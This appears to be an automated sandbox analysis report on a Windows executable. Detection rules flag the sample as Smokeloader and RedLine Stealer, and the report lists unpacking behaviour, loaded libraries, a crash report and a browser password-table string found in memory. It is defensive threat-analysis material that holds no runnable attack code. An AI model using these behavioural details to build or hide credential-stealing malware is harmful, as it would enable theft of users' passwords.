Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0041498C	0_2_0041498C
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0042E1B4	0_2_0042E1B4
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0043B24F	0_2_0043B24F
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0042D257	0_2_0042D257
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0043E260	0_2_0043E260
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0042D266	0_2_0042D266
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00429275	0_2_00429275
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0042D214	0_2_0042D214
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00428A1C	0_2_00428A1C
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0041EAC0	0_2_0041EAC0
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00431AC0	0_2_00431AC0
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_004042E0	0_2_004042E0
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00419A85	0_2_00419A85
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00428A93	0_2_00428A93
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0040DAA4	0_2_0040DAA4
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00424B57	0_2_00424B57
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00425B60	0_2_00425B60
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00435373	0_2_00435373
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00417B7D	0_2_00417B7D
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00406300	0_2_00406300
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0043A300	0_2_0043A300
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00426320	0_2_00426320
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0042332F	0_2_0042332F
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0040ABC0	0_2_0040ABC0
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0042CBC2	0_2_0042CBC2
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00427BD5	0_2_00427BD5
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_004093F0	0_2_004093F0
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_004463BF	0_2_004463BF
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00436440	0_2_00436440
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00422C50	0_2_00422C50
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0040B406	0_2_0040B406
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00418C0E	0_2_00418C0E
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00404C10	0_2_00404C10
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0043CCE0	0_2_0043CCE0
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00414540	0_2_00414540
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0041E540	0_2_0041E540
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00407570	0_2_00407570
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0041B5C0	0_2_0041B5C0
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0043CDE0	0_2_0043CDE0
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00416DF8	0_2_00416DF8
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00415D8A	0_2_00415D8A
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0043E5A0	0_2_0043E5A0
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00415649	0_2_00415649
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00428E72	0_2_00428E72
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00424600	0_2_00424600
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00429611	0_2_00429611
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0041DE20	0_2_0041DE20
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0043AF5E	0_2_0043AF5E
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00419761	0_2_00419761
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0042576B	0_2_0042576B
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0041CF70	0_2_0041CF70
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0042BF1D	0_2_0042BF1D
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0041BF22	0_2_0041BF22
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00402F30	0_2_00402F30
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00405F30	0_2_00405F30
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00423732	0_2_00423732
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00426FD4	0_2_00426FD4
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00425FF0	0_2_00425FF0
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0043CF80	0_2_0043CF80
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0040DF8D	0_2_0040DF8D
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00406790	0_2_00406790
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0042BF9C	0_2_0042BF9C
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00439FA0	0_2_00439FA0
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0096E087	0_2_0096E087
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_009870F7	0_2_009870F7
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_009790EA	0_2_009790EA
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00966019	0_2_00966019
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0096705F	0_2_0096705F
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00953197	0_2_00953197
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00956197	0_2_00956197
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0097C184	0_2_0097C184
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0096C189	0_2_0096C189
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0098B1C5	0_2_0098B1C5
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0095E1F4	0_2_0095E1F4
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0097D1E5	0_2_0097D1E5
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0097C203	0_2_0097C203
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0098A207	0_2_0098A207
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0098E207	0_2_0098E207
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00976257	0_2_00976257
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0096D275	0_2_0096D275
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0096E387	0_2_0096E387
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00959387	0_2_00959387
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_009663B9	0_2_009663B9
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0097D3E7	0_2_0097D3E7
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0096A307	0_2_0096A307
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00980327	0_2_00980327
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0097D4BE	0_2_0097D4BE
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0098B4B6	0_2_0098B4B6
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_009794DC	0_2_009794DC
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0097D4CD	0_2_0097D4CD
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0098E4C7	0_2_0098E4C7
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0097C4FB	0_2_0097C4FB
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0097E41B	0_2_0097E41B
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00968432	0_2_00968432
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0097D47B	0_2_0097D47B
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00967584	0_2_00967584
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_009855DA	0_2_009855DA
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00954547	0_2_00954547
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00956567	0_2_00956567
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0098A567	0_2_0098A567
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_009866A7	0_2_009866A7
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00959657	0_2_00959657
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0096E7A7	0_2_0096E7A7
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_009577D7	0_2_009577D7
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0096888D	0_2_0096888D
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_009668B9	0_2_009668B9
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_009678E5	0_2_009678E5
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0098E807	0_2_0098E807
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0096B827	0_2_0096B827
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0095D872	0_2_0095D872
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_009619BB	0_2_009619BB
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_009699C8	0_2_009699C8
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_009569F7	0_2_009569F7
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_009789F9	0_2_009789F9
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0097CABD	0_2_0097CABD
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00953B97	0_2_00953B97
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0096BB17	0_2_0096BB17
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0096EB07	0_2_0096EB07
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00987B37	0_2_00987B37
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00959B57	0_2_00959B57
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0098EB47	0_2_0098EB47
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00955B77	0_2_00955B77
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00958C47	0_2_00958C47
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00989D37	0_2_00989D37
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0096ED27	0_2_0096ED27
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00981D27	0_2_00981D27
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00976D77	0_2_00976D77
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00972EB7	0_2_00972EB7
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00960EAF	0_2_00960EAF
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0095AE27	0_2_0095AE27
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0097CE29	0_2_0097CE29
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00974E47	0_2_00974E47
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00986E47	0_2_00986E47
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00954E77	0_2_00954E77

Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: String function: 00958367 appears 74 times
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: String function: 00964797 appears 71 times
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: String function: 00408100 appears 35 times
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: String function: 00414530 appears 71 times

Source: C:\Users\user\Desktop\vPqd8HLs88.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7868 -s 1732

Source: vPqd8HLs88.exe, 00000000.00000002.1667299434.0000000000462000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamesOdilemio> vs vPqd8HLs88.exe
Source: vPqd8HLs88.exe, 00000000.00000003.1378386815.00000000005A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesOdilemio> vs vPqd8HLs88.exe
Source: vPqd8HLs88.exe	Binary or memory string: OriginalFilenamesOdilemio> vs vPqd8HLs88.exe

Source: vPqd8HLs88.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000002.1667957943.0000000000950000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.1667924711.0000000000920000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@2/5@1/1

Source: C:\Users\user\Desktop\vPqd8HLs88.exe

Code function: 0_2_009207A6 CreateToolhelp32Snapshot,Module32First,

0_2_009207A6

Source: C:\Users\user\Desktop\vPqd8HLs88.exe

Code function: 0_2_00436E90 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

0_2_00436E90

Source: C:\Windows\SysWOW64\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7868

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\c39ec695-dd58-4e51-b526-ba5657a21156

Jump to behavior

Source: vPqd8HLs88.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\vPqd8HLs88.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: vPqd8HLs88.exe, 00000000.00000003.1426554286.0000000002E6B000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1451751045.0000000002E6E000.00000004.00000800.00020000.00000000.sdmp, vPqd8HLs88.exe, 00000000.00000003.1426427275.0000000002E88000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: vPqd8HLs88.exe

ReversingLabs: Detection: 58%

Source: C:\Users\user\Desktop\vPqd8HLs88.exe

File read: C:\Users\user\Desktop\vPqd8HLs88.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\vPqd8HLs88.exe "C:\Users\user\Desktop\vPqd8HLs88.exe"
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7868 -s 1732

Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\vPqd8HLs88.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\vPqd8HLs88.exe

Unpacked PE file: 0.2.vPqd8HLs88.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\vPqd8HLs88.exe

Unpacked PE file: 0.2.vPqd8HLs88.exe.400000.0.unpack

Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00445441 push ebp; iretd	0_2_00445442
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0043CC90 push eax; mov dword ptr [esp], FBFAF9C8h	0_2_0043CC92
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_00439EF0 push eax; mov dword ptr [esp], 0A0B0C0Dh	0_2_00439EFE
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_009250A0 pushad ; ret	0_2_009250A1
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_009231BF pushad ; ret	0_2_009231C0
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0098A157 push eax; mov dword ptr [esp], 0A0B0C0Dh	0_2_0098A165
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Code function: 0_2_0098CEF7 push eax; mov dword ptr [esp], FBFAF9C8h	0_2_0098CEF9

Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\vPqd8HLs88.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
